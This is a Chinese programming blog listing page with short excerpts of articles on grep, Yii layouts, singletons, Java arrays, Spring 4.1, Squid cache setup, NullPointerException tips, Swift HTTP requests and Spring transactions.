           在Mac或者Linux下使用grep进行文件内容查找时,如果给定的目标搜索路径是当前目录,那么它默认只搜索当前目录下的文件,而不会搜索其下面子目录中的文件内容,如果想级联搜索下级目录,需要使用一个“-r”参数: grep -n -r "GET" .   上面的命令将会找出当前目录“.”及当前目录中所有下级目录
  • yii 修改模块使用的布局文件 dcj3sjt126com yiilayouts
    方法一:yii模块默认使用系统当前的主题布局文件,如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件; 如果未配置主题,那么 yii的模块就使用  protected/views/layouts 下的布局文件, 总之默认不是使用自身目录 pr
  • 设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
                    今天该来的面试还没来,这个店估计不会来电话了,安静下来写写博客也不错,没事翻了翻小易哥的博客甚至与大牛们之间的差距,基础知识不扎实建起来的楼再高也只能是危楼罢了,陈下心回归基础把以前学过的东西总结一下。   *********************************
  • 8、数组 豆豆咖啡 二维数组数组一维数组
      一、概念       数组是同一种类型数据的集合。其实数组就是一个容器。   二、好处       可以自动给数组中的元素从0开始编号,方便操作这些元素   三、格式   //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
  • Decode Ways hcx2013 decode
    A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
  • Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • squid3(高命中率)缓存服务器配置 liyonghui160com
        系统:centos 5.x   需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
  • 避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
    1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法,而非未知对象。   总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的,调用a.equals(b)和调用b.equals(a)是完全相同的,这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针,这种调用可能导致一个空指针异常 Object unk
  • 如何在Swift语言中创建http请求 shoothao httpswift
    概述:本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。 如果你对Objective-C比较了解的话,对于如何创建http请求你一定驾轻就熟了,而新语言Swift与其相比只有语法上的区别。但是,对才接触到这个崭新平台的初学者来说,他们仍然想知道“如何在Swift语言中创建http请求?”。 在这里,我将作出一些建议来回答上述问题。常见的
  • Spring事务的传播方式 uule spring事务
    传播方式:        新建事务       required       required_new   - 挂起当前         非事务方式运行       supports   &nbs
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他